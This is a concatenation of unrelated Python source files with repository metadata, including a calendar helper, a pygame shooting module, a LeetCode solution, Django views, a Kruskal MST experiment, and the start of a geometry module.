AT_THE_MOUSE_SNAP_TO_Y = AnnotationLocation(0,0)
"""*
** Specifies that a point's annotation (label) should
** be positioned so as to be centered on the symbol
** used to represent the point.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
*"""
CENTER = AnnotationLocation(0,0)
north = AnnotationLocation(0,-1)
west = AnnotationLocation(-1, 0)
south = AnnotationLocation(0, 1)
"""*
** Specifies that a point's annotation (label) should be
** placed just above, and centered horizontally on,
** vertical bars that grow down from a horizontal
** baseline, and just below, and centered horizontally on,
** vertical bars that grow up from a horizontal baseline.
**
** <p>
**
** This another name for
** <tt>AnnotationLocation.NORTH</tt>. Its sole purpose is
** to clarify/document the behavior of this location type
** when used in conjunction with curves that employ
** <tt>VBAR_BASELINE_*</tt> symbol types.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
** @see SymbolType#VBAR_BASELINE_CENTER SymbolType.VBAR_BASELINE_CENTER
**
*"""
CLOSEST_TO_HORIZONTAL_BASELINE = north
"""*
** Specifies that a point's annotation (label) should be
** placed just to the right of, and centered vertically
** on, horizontal bars that grow left from a vertical
** baseline, and just to the left of, and centered
** vertically on, horizontal bars that grow right from a
** vertical baseline.
**
** <p>
**
** This another name for
** <tt>AnnotationLocation.WEST</tt>. Its sole purpose is
** to clarify/document the behavior of this location type
** when used in conjunction with curves that employ the
** <tt>HBAR_BASELINE_*</tt> symbol types.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
** @see SymbolType#HBAR_BASELINE_CENTER SymbolType.HBAR_BASELINE_CENTER
**
*"""
CLOSEST_TO_VERTICAL_BASELINE = west
"""*
** Specifies that a point's annotation (label) should
** be positioned just to the right of, and vertically
** centered on, the symbol used to represent the
** point.
**
** @see Curve.Point#setAnnotationLocation
*"""
EAST = AnnotationLocation(1, 0)
"""*
** Specifies that a point's annotation (label) should be
** placed just below, and centered horizontally on,
** vertical bars that grow down from a horizontal
** baseline, and just above, and centered horizontally on,
** vertical bars that grow up from a horizontal baseline.
**
** <p>
**
** This another name for
** <tt>AnnotationLocation.SOUTH</tt>. Its sole purpose is
** to clarify/document the behavior of this location type
** when used in conjunction with curves that employ
** <tt>VBAR_BASELINE_*</tt> symbol types.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
** @see SymbolType#VBAR_BASELINE_CENTER SymbolType.VBAR_BASELINE_CENTER
**
*"""
FARTHEST_FROM_HORIZONTAL_BASELINE = south
"""*
** Specifies that a point's annotation (label) should be
** placed just to the left of, and centered vertically on,
** horizontal bars that grow left from a vertical
** baseline, and just to the right of, and centered
** vertically on, horizontal bars that grow right from a
** vertical baseline.
**
** <p>
**
** This another name for
** <tt>AnnotationLocation.EAST</tt>. Its sole purpose is
** to clarify/document the behavior of this location type
** when used in conjunction with curves that employ the
** <tt>HBAR_BASELINE_*</tt> family of symbol types.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
** @see SymbolType#HBAR_BASELINE_CENTER SymbolType.HBAR_BASELINE_CENTER
**
*"""
FARTHEST_FROM_VERTICAL_BASELINE = EAST
"""*
** Specifies that a point's annotation (label) should
** be positioned just inside, and centered on, the
** arc side of a pie slice.
** <p>
**
** You can move a pie slice's annotation a specific number
** of pixels radially away from (or towards) the pie
** center by passing a positive (or negative) argument to
** the associated <tt>Point</tt>'s
** <tt>setAnnotationXShift</tt> method.
**
** <p> This is pie-friendly synonym for, and when used
** with non-pie symbol types will behave exactly the same
** as, <tt>AnnotationLocation.NORTH</tt>
**
** @see #OUTSIDE_PIE_ARC OUTSIDE_PIE_ARC
** @see #ON_PIE_ARC ON_PIE_ARC
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
** @see AnnotationLocation#NORTH NORTH
*"""
INSIDE_PIE_ARC = north
"""*
** Specifies that a point's annotation (label) should
** be positioned just above, and horizontally centered on,
** the symbol used to represent the point.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
*"""
NORTH = north
"""*
** Specifies that a point's annotation (label) should
** be positioned just to the right of and above,
** the symbol used to represent the
** point.
**
** @see Curve.Point#setAnnotationLocation
*"""
NORTHEAST = AnnotationLocation(1, -1)
"""*
** Specifies that a point's annotation (label) should
** be positioned just to the left of and above,
** the symbol used to represent the
** point.
**
** @see Curve.Point#setAnnotationLocation
*"""
NORTHWEST = AnnotationLocation(-1, -1)
"""*
** Specifies that a point's annotation (label) should
** be centered on the center-point of the
** arc side of a pie slice.
** <p>
**
** You can move a pie slice's annotation a specific number
** of pixels radially away from (or towards) the pie
** center by passing a positive (or negative) argument to
** the associated <tt>Point</tt>'s
** <tt>setAnnotationXShift</tt> method.
**
**
**
** <p> This is pie-friendly synonym for, and when used
** with non-pie symbol types will behave exactly the same
** as, <tt>AnnotationLocation.CENTER</tt>
**
** @see #OUTSIDE_PIE_ARC OUTSIDE_PIE_ARC
** @see #INSIDE_PIE_ARC INSIDE_PIE_ARC
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
** @see AnnotationLocation#CENTER CENTER
**
*"""
ON_PIE_ARC = CENTER
"""*
** Specifies that a point's annotation (label) should
** be positioned just outside, and centered on, the
** arc side of a pie slice.
** <p>
**
** You can move a pie slice's annotation a specific number
** of pixels radially away from (or towards) the pie
** center by passing a positive (or negative) argument to
** the associated <tt>Point</tt>'s
** <tt>setAnnotationXShift</tt> method.
**
** <p> This is pie-friendly synonym for, and when used
** with non-pie symbol types will behave exactly the same
** as, <tt>AnnotationLocation.SOUTH</tt>
**
** @see #INSIDE_PIE_ARC INSIDE_PIE_ARC
** @see #ON_PIE_ARC ON_PIE_ARC
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
** @see Curve.Point#setAnnotationXShift setAnnotationXShift
** @see AnnotationLocation#SOUTH SOUTH
*"""
OUTSIDE_PIE_ARC = south
"""*
** Specifies that a point's annotation (label) should
** be positioned just below, and horizontally centered on,
** the symbol used to represent the point.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
*"""
SOUTH = south
"""*
** Specifies that a point's annotation (label) should
** be positioned just to the right of and below,
** the symbol used to represent the
** point.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
*"""
SOUTHEAST = AnnotationLocation(1, 1)
"""*
** Specifies that a point's annotation (label) should
** be positioned just to the left of and below,
** the symbol used to represent the
** point.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
*"""
SOUTHWEST = AnnotationLocation(-1, 1)
"""*
** Specifies that a point's annotation (label) should
** be positioned just to the left of, and vertically
** centered on, the symbol used to represent the
** point.
**
** @see Curve.Point#setAnnotationLocation setAnnotationLocation
*"""
WEST = west
"""Copyright (c) 2009, Sergio Gabriel Teves
All rights reserved.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
"""GoogleCalendar Helper
Version: 0.1 03-20-2009
Sergio Gabriel Teves
Initial Release
0.2 03-25-2009
Process recurrent events
#TODO: add reminders to recurrent events
0.3 03-26-2009
Add reminders limits
Add recurrence on copy method
"""
import time
import datetime
import copy
import gdata.calendar
import atom
from xml.utils import iso8601
from icalendar import Calendar as iCal, LocalTimezone
class CalendarEvent:
"""CalendarEvent
This class is an event wrapper.
It allow the user to add and modify events without
having to worry about atom formats.
"""
SMS = 'sms'
EMAIL = 'email'
POPUP = 'alert'
DEFAULT = 'all'
MINUTES = 'minutes'
HOURS = 'hours'
DAYS = 'days'
WEEKS = 'weeks'
_DAY = 'DAILY'
_WEEK = 'WEEKLY'
_MONTH = 'MONTHLY'
_YEAR = 'YEARLY'
_event = None
_rec = 0
_MAX_REMINDER = 40320 # 4 WEEKS
_MIN_REMINDER = 5
def __init__(self, event=None, title=None, start_date=None, end_date=None, description=None, where=None):
"""Return an Event Instance
If event is specified all other arguments are ignored
"""
if event is not None:
self._event = event
if len(self._event.when)>0:
self._event.when.sort(key=lambda obj: obj.start_time)
else:
self._event = gdata.calendar.CalendarEventEntry()
if title is not None:
self.set_title(title)
if start_date is not None:
self.set_start_date(start_date)
if end_date is not None:
self.set_end_date(end_date)
if description is not None:
self.set_description(description)
if where is not None:
self.set_where(where)
def __cmp__(self, other):
return cmp(self.get_start_date(),other.get_start_date())
def __str__(self):
return ("{id: '%s', title: '%s', start: '%s', end: '%s', description: '%s', where: '%s'}" %
(self.get_id(), self.get_title(),self.get_start_date(),
self.get_end_date(), self.get_description(), self.get_where()))
def _encode_date(self, date):
if date.__class__ is datetime.date:
_date = time.strftime('%Y-%m-%d', time.gmtime(time.mktime(date.timetuple())))
else:
_date = time.strftime('%Y-%m-%dT%H:%M:%S.000Z', time.gmtime(time.mktime(date.timetuple())))
return _date
def _decode_date(self, str):
if len(str) == 10:
_date = time.strptime(str, '%Y-%m-%d')
_date = datetime.datetime(_date.tm_year, _date.tm_mon, _date.tm_mday,0,0,0)
else:
_date = datetime.datetime.fromtimestamp(iso8601.parse(str))
_date = _date.replace(tzinfo=None)
return _date
def set_title(self, title):
self._event.title = atom.Title(text=title)
def set_start_date(self, date):
"""pass datetime.date for an all day event, no end date is necessary"""
_date = self._encode_date(date)
if len(self._event.when) == 0:
self._event.when.append(gdata.calendar.When(start_time=_date))
else:
self._event.when[0].start_time = _date
def set_end_date(self, date):
_date = self._encode_date(date)
if len(self._event.when) == 0:
self._event.when.append(gdata.calendar.When(end_time=_date))
else:
self._event.when[0].end_time = _date
def set_description(self, description):
self._event.content = atom.Content(text=description)
def set_where(self, where):
if len(self._event.where) == 0:
self._event.where.append(gdata.calendar.Where(value_string=where))
else:
self._event.where[0] = gdata.calendar.Where(value_string=where)
def get_title(self):
return self._event.title.text
def get_start_date(self):
"""return None if no date is set"""
_date = None
if len(self._event.when) > 0:
_date = self._decode_date(self._event.when[self._rec].start_time)
return _date
def get_end_date(self):
"""return None if no date is set"""
_date = None
if len(self._event.when) > 0:
_date = self._decode_date(self._event.when[self._rec].end_time)
return _date
def _process_recurrence(self):
return iCal.from_string("BEGIN:VEVENT\n%sEND:VEVENT" % self._event.recurrence.text)
def get_description(self):
_str=""
if self._event.content.text is not None:
_str=self._event.content.text
return _str
def get_where(self):
_str = ""
if len(self._event.where) > 0:
if self._event.where[0].value_string is not None:
_str = self._event.where[0].value_string
return _str
def get_event(self):
"""return a gdata.calendar.CalendarEventEntry"""
return self._event
def add_reminder(self, method="all", minutes=None, hours=None, days=None, weeks=None):
"""
time_type could be 'minutes','hours', 'days', 'weeks'
"""
if method != "all":
if weeks is not None:
minutes = ((weeks * 7) * 24) * 60
elif days is not None:
minutes = (days * 24) * 60
elif hours is not None:
minutes = hours * 60
if minutes > self._MAX_REMINDER:
minutes = self._MAX_REMINDER
elif minutes < self._MIN_REMINDER:
minutes = self._MIN_REMINDER
_reminder = gdata.calendar.Reminder(minutes=minutes)
else:
_reminder = gdata.calendar.Reminder()
_reminder._attributes['method'] = 'method'
_reminder.method = method
if len(self._event.when) == 0:
self._event.when.append(gdata.calendar.When())
self._event.when[0].reminder.append(_reminder)
else:
self._event.when[0].reminder.append(_reminder)
def get_reminders(self):
"""Return a read only list of dict in the form {method, type, time}"""
reminders = []
if len(self._event.when)>0:
for a_reminder in self._event.when[0].reminder:
_reminder = {}
_reminder["method"] = a_reminder._ToElementTree().get("method")
_val = int(a_reminder.minutes)
if _val % 10080 == 0:
_reminder["type"] = "weeks"
_reminder["time"] = _val / 10080
elif _val % 1440 == 0:
_reminder["type"] = "days"
_reminder["time"] = _val / 1440
elif _val % 60 == 0:
_reminder["type"] = "hours"
_reminder["time"] = _val / 60
else:
_reminder["type"] = "minutes"
_reminder["time"] = _val
reminders.append(_reminder)
return reminders
def get_id(self):
_id = None
if self._event.id is not None:
_id = self._event.id.text.split("/")[-1].split("_")[0]
return _id
def copy(self, event):
self.set_title(event.get_title())
self.set_description(event.get_description())
self.set_where(event.get_where())
self._event.when = event.get_event().when
self._event.recurrence = event.get_event().recurrence
#self._event.who = event.who
def get_guests(self):
"""Returns a list of dict in the form {email, name, type, status}"""
list = []
for p, _who in enumerate(self._event.who):
_guest = {}
_guest["email"] = _who.email
_guest["name"] = _who.name
_guest["type"] = _who.value
if _who.attendee_status is not None:
_guest["status"] = _who.attendee_status.value
else:
_guest["status"] = "ACCEPTED"
list.append(_guest)
return list
def add_guest(self, name, email):
self._event.who.append(gdata.calendar.Who(name=name, email=email))
def remove_guest(self, email):
_guest = None
for p, _who in enumerate(self._event.who):
if email == _who.email:
_guest = _who
break
if _guest is not None:
self._event.who.remove(_guest)
def is_recurrent(self):
return len(self._event.when) > 1
def get_recurrences(self):
list = []
for i, a_when in enumerate(self._event.when):
_new = copy.copy(self)
_new._rec = i
list.append(_new)
return list
def get_recurrence_data(self):
r = {}
c = iCal.from_string("BEGIN:EVENT\n%sEND:EVENT" % self._event.recurrence.text)
r['DTSTART']=c['DTSTART'].dt
r['DTEND']=c['DTEND'].dt
r['FREQ']=c['RRULE']['FREQ'][0]
if c['RRULE'].has_key('WKST'):
r['WKST']=c['RRULE']['WKST'][0]
if c['RRULE'].has_key('UNTIL'):
r['UNTIL']=c['RRULE']['UNTIL'][0].astimezone(LocalTimezone())
if c['RRULE'].has_key('BYDAY'):
r['BYDAY']=c['RRULE']['BYDAY']
if c['RRULE'].has_key('INTERVAL'):
r['INTERVAL']=c['RRULE']['INTERVAL'][0]
return r
def set_recurrence_data(self, freq=None, by_day=None, interval=None, until=None):
rec = ('DTSTART;TZID=UTC:' + time.strftime('%Y%m%dT%H%M%SZ', self.get_start_date().timetuple()) + '\r\n'
+ 'DTEND;TZID=UTC:' + time.strftime('%Y%m%dT%H%M%SZ', self.get_end_date().timetuple()) + '\r\n'
+ 'RRULE:FREQ=' + freq)
if by_day is not None and len(by_day)>0:
if by_day.__class__ is list:
rec += ';BYDAY=' + ",".join(by_day)
else:
rec += ';BYDAY=' + by_day
if interval is not None:
rec += ';INTERVAL=' + str(int(interval))
if until is not None:
_d = self.get_end_date()
_until = datetime.datetime(until.year, until.month, until.day, _d.hour, _d.minute, 0)
rec += ';UNTIL=' + time.strftime('%Y%m%dT%H%M%SZ', _until.timetuple())
rec += "\r\n"
self._event.recurrence = gdata.calendar.Recurrence(text=rec)
# -*- coding: utf-8 -*-
'''
Copyright (c) 2012 Clément Blaudeau
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
'''
#------------------------------
# tir.py
# Clement Blaudeau
# ******
#------------------------------
# Fichier qui gère les tirs
# des personnages
#------------------------------
import pygame
from pygame.locals import *
import general
class tir1:
def __init__(self):
self.image = [pygame.image.load("../images/tir.png").convert_alpha(),pygame.image.load("../images/tir2.png").convert_alpha(),pygame.image.load("../images/tir3.png").convert_alpha()]
self.sound = pygame.mixer.Sound("../son/tir.ogg")
self.positions = []
self.k = 0
def Progress(self):
i = 0
for element in self.positions:
self.positions[i] = self.positions[i].move(0,-3)
if self.positions[i].bottom < 0:
self.positions.remove(self.positions[i])
i +=1
def Display(self, window):
for element in self.positions:
window.blit(self.image[general.niv], element)
def Tir(self,position):
if ((pygame.time.get_ticks() - self.k) > 100-(5*general.niv)):
self.k = pygame.time.get_ticks()
general.tirs += 1
self.sound.set_volume(0.2)
self.sound.play()
self.positions.append(Rect(0,0,20,30).move(position.left + 20, position.top - 10))
class tir2:
def __init__(self):
self.image = [pygame.image.load("../images/attaque.png").convert_alpha(),pygame.image.load("../images/attaque2.png").convert_alpha(),pygame.image.load("../images/attaque3.png").convert_alpha()]
self.positions = []
self.sound = pygame.mixer.Sound("../son/tir2.ogg")
self.k = 0
def Progress(self):
i = 0
for element in self.positions:
self.positions[i] = self.positions[i].move(0,-3)
if self.positions[i].top < - 50:
self.positions.remove(self.positions[i])
i +=1
def Display(self, window):
for element in self.positions:
window.blit(self.image[general.niv], element)
def Tir(self,position):
if ((pygame.time.get_ticks() - self.k) > 350-(5*general.niv)):
self.k = pygame.time.get_ticks()
self.positions.append(Rect(0,0,20,30).move(position.left + 20, position.top - 20))
self.sound.play()
self.sound.set_volume(0.2)
general.tirs += 3
UTF-8
Python
false
false
2,014
18,150,531,798,422
1238803964061f64cc625fee53cdbd58ac11a22d
fd66de82338e67291a220bb935882585f702d4bc
/Python/unique_paths_ii.py
3282b302cd6b23ef223c7e7a17e8fcbb27521b2f
[]
no_license
littleday/leetcodeOJ
https://github.com/littleday/leetcodeOJ
37361251495ce1a7a2c8c22c0d23bbaf56b3a022
c3c25fd7dce50e6a4ccfe6cf62b0578887ddfe0a
refs/heads/master
2016-08-02T20:30:26.819989
2014-10-17T00:50:13
2014-10-17T00:50:13
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
class Solution:
# @param obstacleGrid, a list of lists of integers
# @return an integer
# DP method
def uniquePathsWithObstacles(self, obstacleGrid):
if obstacleGrid == None:
return 0
m = len(obstacleGrid)
n = len(obstacleGrid[0])
record = [[0 for value in range(0, n)] for value in range(0, m)]
flag = 1
for i in range(0, n):
if obstacleGrid[0][i] == 1:
flag = 0
record[0][i] = flag
else:
record[0][i] = flag
flag = 1
for j in range(0, m):
if obstacleGrid[j][0] == 1:
flag = 0
record[j][0] = flag
else:
record[j][0] = flag
for i in range(1, n):
for j in range(1,m):
if obstacleGrid[j][i] == 1:
record[j][i] = 0
else:
record[j][i] = record[j-1][i] + record[j][i-1]
return record[m-1][n-1]
# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1
#
# The contents of this file are subject to the Mozilla Public License Version
# 1.1 (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS" basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
#
# The Original Code is Raindrop.
#
# The Initial Developer of the Original Code is
# Mozilla Messaging, Inc..
# Portions created by the Initial Developer are Copyright (C) 2009
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
#
# Takes the raw IMAP flags from an IMAP server and converts them to
# raindrop schema items which convey the same information.
# XXX - currently only '\\Seen' is supported...
from raindrop.proto.imap import get_rdkey_for_email
def handler(doc):
# This is dealing with the 'imap folder state cache doc' - it stores
# all meta-data about all items in a folder; so one document holds the
# state for many messages. We first need to determine which are
# different...
rdkeys = []
imap_flags = []
folder_name = doc['rd_key'][1][1]
for item in doc['infos']:
msg_id = item['ENVELOPE'][-1]
rdkey = get_rdkey_for_email(msg_id)
rdkeys.append(rdkey)
imap_flags.append((rdkey, item['FLAGS']))
result = open_view('raindrop!content!all', 'msg-seen-flag', keys=rdkeys)
# turn the result into a dict keyed by rdkey
couch_values = {}
for row in result['rows']:
couch_values[hashable_key(row['key'])] = row['value']
# work out which of these rdkeys actually exist in our db.
existing_rdkeys = set()
existing = open_schemas(((rdkey, 'rd.msg.rfc822') for rdkey in rdkeys),
include_docs=False)
for e, rdkey in zip(existing, rdkeys):
if e is not None:
existing_rdkeys.add(rdkey)
# find what is different...
nnew = 0
nupdated = 0
# Note it is fairly common to see multiples with the same msg ID in, eg
# a 'drafts' folder, so skip duplicates to avoid conflicts.
seen_keys = set()
for rdkey, flags in imap_flags:
if rdkey in seen_keys:
logger.info('skipping duplicate message in folder %r: %r',
folder_name, rdkey)
continue
if rdkey not in existing_rdkeys:
# this means we haven't actually sucked the message into raindrop
# yet (eg, --max-age may have caused only a subset of the messages
# to be grabbed, although all messages in the folder are returned
# in the input document)
logger.debug('skipping message not yet in folder %r: %r',
folder_name, rdkey)
continue
seen_keys.add(rdkey)
seen_now = "\\Seen" in flags
try:
couch_value = couch_values[rdkey]
except KeyError:
# new message
items = {'seen' : seen_now,
'outgoing_state' : 'incoming',
}
emit_schema('rd.msg.seen', items, rdkey)
nnew += 1
else:
# If the state in couch is anything other than 'incoming'', it
# represents a request to change the state on the server (or the
# process of trying to update the server).
if couch_value.get('outgoing_state') != 'incoming':
logger.info("found outgoing 'seen' state request in doc with key %r", rdkey)
continue
seen_couch = couch_value['seen']
if seen_now != seen_couch:
items = {'seen' : seen_now,
'outgoing_state' : 'incoming',
'_rev' : couch_value['_rev'],
}
emit_schema('rd.msg.seen', items, rdkey)
nupdated += 1
logger.info("folder %r needs %d new and %d updated 'seen' records",
folder_name, nnew, nupdated)
import unittest
from Test.test_helper import BuildPokemonBattleWrapper
from Battle.Attack.DamageDelegates.damage_delegate import DamageDelegate
from Battle.Attack.DamageDelegates.piercedodge_2Xdelegate import PierceDodge2XDelegate
class coreDamage(unittest.TestCase):
""" Test cases of coreDamage """
def setUp(self):
""" Build the Pkmn and Delegate for the test """
self.user = BuildPokemonBattleWrapper()
self.target = BuildPokemonBattleWrapper()
self.dodge = "DIG"
self.delegate = PierceDodge2XDelegate(None, 20, 1, self.dodge)
self.standard = DamageDelegate(None, 20, 1)
def pierce(self):
""" Test that the damage is doubled on pierce """
self.target.dodge = self.dodge
standard = self.standard.coreDamage(self.user, self.target)
damage = self.delegate.coreDamage(self.user, self.target)
assert damage == standard*2 , "The damage should be double on pierce"
def noPierce(self):
""" Test that the damage is standard when there is no pierce """
self.target.dodge = None
standard = self.standard.coreDamage(self.user, self.target)
damage = self.delegate.coreDamage(self.user, self.target)
assert damage == standard , "The damage should be standard on no pierce"
# Collect all test cases in this class
testcasesCoreDamage = ["pierce", "noPierce"]
suiteCoreDamage = unittest.TestSuite(map(coreDamage, testcasesCoreDamage))
##########################################################
# Collect all test cases in this file
suites = [suiteCoreDamage]
suite = unittest.TestSuite(suites)
if __name__ == "__main__":
unittest.main()
UTF-8
Python
false
false
2,014
1,099,511,651,530
fc8c6fae45c386d157bb180a0714f750b1dd523b
be05189e4f2bf44f0c10c4b8280b82df2cd0557a
/front/views.py
8faf22c0a65b89f54ee347432c217822d997c98a
[]
no_license
TrevorFSmith/flapdoodle
https://github.com/TrevorFSmith/flapdoodle
bfb36d8ac88db47e69dd91806e73c47710b524fe
f2fecf7d4d08d529f563365e3354c1f57d71e07c
refs/heads/master
2021-03-24T10:11:20.621880
2009-07-20T23:15:49
2009-07-20T23:15:49
223,655
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import datetime
import calendar
import pprint
import traceback
from django.conf import settings
from django.db.models import Q
from django.template import Context, loader
from django.http import HttpResponse, Http404, HttpResponseServerError, HttpResponseRedirect, HttpResponsePermanentRedirect
from django.shortcuts import render_to_response, get_object_or_404
from django.contrib import auth
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from django.contrib.comments.models import Comment
from django.contrib.sites.models import Site
from django.utils.html import strip_tags
import django.contrib.contenttypes.models as content_type_models
from django.template import RequestContext
from django.core.cache import cache
from django.core.mail import send_mail
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from django.template.loader import render_to_string
from django.utils import feedgenerator
from django.core.urlresolvers import reverse
from person.models import InviteRequest, UserProfile
from person.forms import InviteRequestForm, UserCreationForm
from recaptcha.client.captcha import displayhtml as captcha_html
from twitter import Twitter
from models import *
from forms import *
def index(request):
if request.user.is_authenticated(): return HttpResponseRedirect(reverse('front.views.user', kwargs={'username':request.user.username}))
post_invite = False
if request.method == 'POST':
invite_request_form = InviteRequestForm(request.POST)
if invite_request_form.is_valid():
email = invite_request_form.cleaned_data['email']
if InviteRequest.objects.filter(email=email).count() == 0:
invite_request_form.save()
post_invite = True
else:
invite_request_form = InviteRequestForm()
return render_to_response('front/index.html', { 'captcha_form':captcha_html(settings.RECAPTCHA_PUBLIC_KEY), 'registration_form':UserCreationForm(), 'invite_request_form':invite_request_form, 'post_invite':post_invite }, context_instance=RequestContext(request))
def tos(request): return render_to_response('front/tos.html', { }, context_instance=RequestContext(request))
def wtf(request): return render_to_response('front/wtf.html', { }, context_instance=RequestContext(request))
def privacy(request): return render_to_response('front/privacy.html', { }, context_instance=RequestContext(request))
def user(request, username):
user = get_object_or_404(User, username=username)
if request.method == 'POST' and request.user.username == user.username:
publishing_suffix_form = PublishingSuffixForm(request.POST)
if request.POST.get('form_id', None) == 'publishing_suffix_form':
if publishing_suffix_form.is_valid():
PublishingSuffix.objects.set_suffix(user, publishing_suffix_form.cleaned_data['suffix'])
else:
PublishingSuffix.objects.set_suffix(user, None)
publishing_suffix_form = PublishingSuffixForm(initial={'suffix':user.publishing_suffix()})
return render_to_response('front/user.html', { 'user':user, 'publishing_suffix_form':publishing_suffix_form, 'phone_number':settings.TWILIO_PHONE_NUMBER, 'twitter_account_form':TwitterAccountForm() }, context_instance=RequestContext(request))
@login_required
def phones(request, username):
user = get_object_or_404(User, username=username)
if request.user.username != user.username:
return HttpResponseRedirect(reverse('front.views.phones', kwargs={'username':request.user.username}))
return render_to_response('front/phones.html', { 'user':user, 'phone_number':settings.TWILIO_PHONE_NUMBER }, context_instance=RequestContext(request))
@login_required
def event(request, id):
event_line = get_object_or_404(EventLine, pk=id)
print dir(event_line)
return render_to_response('front/event.html', { 'event_line':event_line }, context_instance=RequestContext(request))
@login_required
def twitter(request, username):
user = get_object_or_404(User, username=username)
if request.user.username != user.username:
return HttpResponseRedirect(reverse('front.views.twitter', kwargs={'username':request.user.username}))
page_message = None
if request.method == 'POST':
twitter_account_form = TwitterAccountForm(request.POST)
if twitter_account_form.is_valid():
if TwitterAccount.objects.account_auths(twitter_account_form.cleaned_data['email'], twitter_account_form.cleaned_data['password']):
ta = TwitterAccount.objects.save_as_default(user, twitter_account_form.cleaned_data['email'], twitter_account_form.cleaned_data['password'])
logging.debug('Created a twitter account for %s: %s' % (user, ta))
page_message = 'That Twitter account info checks out and has been saved.'
twitter_account_form = TwitterAccountForm()
else:
page_message = 'I could not use that email and password to talk to Twitter.'
else:
twitter_account_form = TwitterAccountForm()
return render_to_response('front/twitter.html', { 'user':user, 'twitter_account_form':TwitterAccountForm(), 'page_message':page_message }, context_instance=RequestContext(request))
def update_your_browser(request): return render_to_response('front/update_your_browser.html', { }, context_instance=RequestContext(request))
def recording(request, id):
voice_recording = get_object_or_404(VoiceRecording, pk=id)
return render_to_response('front/recording.html', {'voice_recording':voice_recording}, context_instance=RequestContext(request))
UTF-8
Python
false
false
2,009
4,767,413,746,121
3033b64f815887f1c048ea790f820c7a3e9414f6
c10ee4981c792cda2e348a1e7ba0ab22b6f70c2e
/special/kruskalClass.py
48af7536fe1213a42eb870bce9a99239189dfc17
[]
no_license
primalpop/641-Project
https://github.com/primalpop/641-Project
caf33723c5fc4541d826ff6c7d34256905251653
c3209ea7fd6841be31469b4c10efc78559121efb
refs/heads/master
2020-12-24T13:35:54.172308
2013-05-15T20:11:09
2013-05-15T20:11:09
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# N is the set of nodes {a,b,c..}
# A is the set of arcs with costs {(a,b,1),(a,c,2)..}
#
# Use: Kruskal(N,A)
import gen
import time
import math
class Kruskal:
def __init__ (self, N, A):
self.A = sorted(A, key= lambda A: A[2])
self.N = N
self.n = len(N)
self.C = [[u] for u in self.N]
self.T = []
def execute(self):
for shortestA in self.A:
u, v = shortestA[0], shortestA[1]
ucomp, vcomp = self.find(u), self.find(v)
if (ucomp != vcomp):
#print u, v, ":",self.C
self.merge(ucomp, vcomp)
self.T.append((u,v))
if (len(self.T) == (self.n-1)): break
#print "\nMinimum spanning tree:\n", self.T
return self.T
def find (self, u):
i = 0
for c in self.C:
if (u in c): return (c,i)
i += 1
def merge (self, ucomp, vcomp):
self.C = [ucomp[0] + vcomp[0]] + [i for j, i in enumerate(self.C) if j not in [ucomp[1], vcomp[1]]]
# My experiment
timings_vertices2 = []
theorotical2 = []
vertices = 50
import numpy
for nt in numpy.linspace(0.1, 0.95, 20):
start = time.time()
A = gen.topology(vertices,nt)
N = list(xrange(len(A)))
p = []
for i in xrange(1,len(A)):
for j in xrange(1,i):
if A[i][j] != 0:
p.append((i,j,A[i][j]))
myExperiment = Kruskal(N, p)
myExperiment.execute()
end = time.time()
t = end - start
timings_vertices2.append(t)
theorotical2.append(len(p)*math.log(vertices))
print t,len(p), vertices
#!/usr/bin/env python3
#-*- coding:utf-8 -*-
"""
Very basic 2D abstract geometry package. It defines these geometrical
constructs:
* `GeometricObject` - abstract base class, not meant to be used
directly
* `Point`
* `Vector`
* `BoundingBox`
* `Line`
* `Ray`
* `Segment`
* `Polygon`
* ...for now
Notes
-----
Except for the `Point` and `Vector` classes which will be discussed below, all
of the other classes define a `__getitem__` method that can be used to retreive
the points defining the `GeometricObject` by indices.
The `Point` class defines the `__getitem__` method in a sperate way,
i.e. it returns the Cartesian coordinates of the `Point` by indinces.
The `Vector` class does the same except it returns the x & y Cartesian
coordinates in this case.
"""
# system modules
import math
import random
# user defined module
import geo2d_utils as u
# acceptable uncertainty for calculating intersections and such
UNCERTAINTY = 1e-5
def get_perpendicular_to(obj, at_point=None):
"""
Creates a new `Vector` or `Line` perpendicular with
`obj` (`Vector` or `Line`-like) depending on `at_point`
parameter.
The perpendicular vector to the `obj` is not necessarily the unit
`Vector`.
Parameters
----------
obj : vector, line-like
The object to retreive the perpendicular vector to.
at_point : point-like, optional
If this is given then a `Line` is returned instead,
perpendicular to `obj` and passing through `at_point`.
Returns
-------
out : vector
